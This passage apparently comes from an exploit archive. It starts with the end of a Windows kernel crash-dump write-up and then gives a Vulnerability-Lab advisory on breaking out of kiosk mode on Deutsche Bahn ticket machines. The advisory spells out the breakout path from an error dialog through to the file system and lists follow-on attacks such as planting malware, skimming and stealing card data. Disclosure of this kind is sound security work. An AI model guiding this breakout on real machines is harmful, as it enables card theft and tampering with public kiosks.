dxgmms2!VidSchiWorkerThread+0x1a1
8afaebf0 81fe952d 92b76308 93dfc000 00000000 nt!PspSystemThreadStartup+0x4a
8afaebfc 00000000 00000000 bbbbbbbb bbbbbbbb nt!KiThreadStartup+0x15
eax=8afae958 ebx=00000000 ecx=00000000 edx=00000000 *esi*=00000000
edi=bb26afd8
eip=8fe8386c esp=8afae920 ebp=8afae92c iopl=0 nv up ei pl zr na pe
nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000
efl=00010246
BasicRender!WARPGPUCMDSYNC::WARPGPUCMDSYNC+0xc:
8fe8386c c7061060e88f mov dword ptr [esi],offset
BasicRender!WARPGPUCMDSYNC::`vftable' (8fe86010) ds:0023:00000000=????????
Resetting default scope
--------------------------------------------------------------------------------
The vulnerability has only been tested in Windows 10 x86 1803.
CVSS Base Score: 5.5
Credit: Victor Portal
# Exploit Title: Deutsche Bahn Ticket Vending Machine Local Kiosk - Privilege Escalation
# Date: 2019-12-18
# Exploit Author: Vulnerability-Lab
# Vendor Homepage: https://www.bahn.de/db_vertrieb/view/leistungen/automaten-fahrkartenentwerter.shtml
# Tested on: Windows XP
Document Title:
===============
Deutsche Bahn Ticket Vending Machine - Local Kiosk Privilege Escalation Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2191
Vulnerability Magazine:
https://www.vulnerability-db.com/?q=articles/2019/12/13/zero-day-vulnerability-deutsche-bahn-ticket-machine-series-system-uncovered
Release Date:
=============
2019-12-14
Vulnerability Laboratory ID (VL-ID):
====================================
2191
Common Vulnerability Scoring System:
====================================
6.4
Vulnerability Class:
====================
Privilege Escalation
Product & Service Introduction:
===============================
Customers can buy tickets at our ticket machines at any time, regardless
of opening hours. Thus, the vending machine also
secures sales in rural areas.
- innovatively designed user guidance
- Real-time timetable information for rail traffic
- traveler information
- ticket paper supply
- free fault hotline: 0800 2886644
- Professional and contemporary maintenance
The ticket vending machine can also be configured according to
individual requirements. The housing can be designed as desired.
Customers can purchase their tickets with different means of payment.
User guidance is available in different languages.
(Copy of the Homepage:
https://www.bahn.de/db_vertrieb/view/leistungen/automaten-fahrkartenentwerter.shtml
)
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a local kiosk
privilege escalation vulnerability in the deutsche bahn ticket vending
machine series with windows xp.
Vulnerability Disclosure Timeline:
==================================
2019-12-14: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Local
Severity Level:
===============
Medium
Authentication Type:
====================
No authentication (guest)
User Interaction:
=================
No User Interaction
Disclosure Type:
================
Responsible Disclosure Program
Technical Details & Description:
================================
A kiosk mode escalation vulnerability has been discovered in the
official deutsche bahn ticket vending machine series for windows.
The security vulnerability allows local attackers to bypass the kiosk
mode to compromise the local file system and applications.
It is possible for local attackers to break out of the kiosk mode of the
Deutsche Bahn vending machine application if
the Password Agent (PasswordAgent.exe) of the system receives a timeout
or has a runtime error in the program
itself in the background. These errors can occur due to aborted
sessions, unclean logout or common errors when
using the application at system level.
In the event of a local error, attackers can bring the error message to
the foreground by pressing the number field - Cancel
during a transaction. After the error message becomes visible, the
attacker can click on a link of the error message where you
can normally see what the error report contains. The attacker will then
be redirected to a form in the error message, where he
can search for errors in a collection of microsoft articles via "Submit
/ Dont' Submit" or another link on the online path. There
the attacker clicks on it and receives the web browser. From the web
browser, the attacker retrieves the options menu and can access
the local system directory and has then the ability to compromise the
ticket vending machine with windows xp.
The error message is normally on those devices deactivated through a
hardening process of the servce provider. In that special case
the exception handling of windows was not deactivated or set to the
background, which allows the attacker to move through to other
options to finally access the file system via browser.
The ticket vending machine vulnerability requires no user interaction
and can only be exploited by local attackers with physical
device access. No keyboard or front loader opening required.
Vulnerable System(s):
[+] Windows XP
Affected Component(s):
[+] Exception Handling (Error Message Content)
Proof of Concept (PoC):
=======================
The local vulnerability can be exploited by local attackers with
physical device access without user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.
PoC: Sheet
PasswordAgent.exe := Unexpected Error (Background) - Runtime/Session/Timeout
=> Transaction Application => Cancel := Unexpected Error (Background) -
Runtime/Session/Timeout (Front)
=> Click Error Report => Click Search Collection => Web Browser => Local
File System => PWND!
What are attackers able to do when the file system of the vending
machine is accessable thus way?
1. Inject of local malware to the ticket machine (editor / debugger /
cmd / ps - exp. ransomware/malware)
2. Local manipulation for skimming devices to assist (transmit prepares)
2. Phishing of local credentials from screen via system (db browser
application)
3. Intercept or manipulation to access card information (local file
system - sniff/extract)
4. Crash or freeze the computer system (exp. kill of process / loop script)
5. Scare or joké activities (exp. html / js to front screens with web
browser or by a new window process)
Refernece(s):
https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/IMG_6457.JPG
https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/IMG_6458.JPG
https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/IMG_6460.JPG
Solution - Fix & Patch:
=======================
There are now several problems related to system hardening that can be
resolved:
1. It should not be possible for users with system user rights to use
the web browsers
2. The error message menu can be deactivated or completely modified
3. Some functions in menus can be deactivated by hardening (browser,
messages & Co.)
4. Check that all other tasks are always running in the background or
are being moved there permanently
5. The deutsche bahn vending machine application and user interface
should be shut down in the event of persistent errors in the foreground
6. The activities of the testing has been logged but did not triggered
any alert for defense purpose
Deutsche Bahn: Patch Rollout in Progress
https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/073915298_0.png
https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/dbatm78235.png
Security Risk:
==============
The security risk of the local ticket vending machine system
vulnerability is estimated as high. The bug to escalate can be easily
exploited by local interaction with the touch display to access the file
system.
Credits & Authors:
==================
Benjamin K.M. -
https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com
www.vulnerability-db.com
Services: magazine.vulnerability-lab.com
paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2019 | Vulnerability Laboratory - [Evolution
Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com